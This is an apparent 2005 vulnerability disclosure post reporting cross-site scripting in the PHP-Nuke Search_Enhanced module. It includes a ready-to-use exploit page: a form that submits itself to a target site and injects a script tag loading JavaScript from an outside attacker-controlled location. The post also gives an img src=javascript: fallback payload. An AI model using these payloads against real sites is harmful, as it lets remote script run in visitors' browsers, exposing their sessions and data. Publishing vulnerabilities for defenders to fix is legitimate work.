i am sorry but i had a little problem with my old e-mail address , my new one is bhfh01@xxxxxxxxx the mail: PHP-Nuke Search Cross-Site Scripting Vulnerability Vulnerable: i think all ver. data:2005-09-5 The search field at modules.php?name=Search_Enhanced is vulnerable to html injection attacks. exploit : #open_me.htm :: <html> <form name=searchform method=post action=http://[target]/modules.php?name=Search_Enhanced> <input type="text" name="query" size="15" value='<script src=http://[location]/js.js></script>'> <input type=submit name=sub> <script>document.searchform.sub.click()</script> </html> Note: the chars ' and " are not allowd in that search. If the '<script>' tag isnt allowed , try to search the value: <img src=javascript:alert("xss-here")> ... thanks , B~HFH. bhfh01@xxxxxxxxx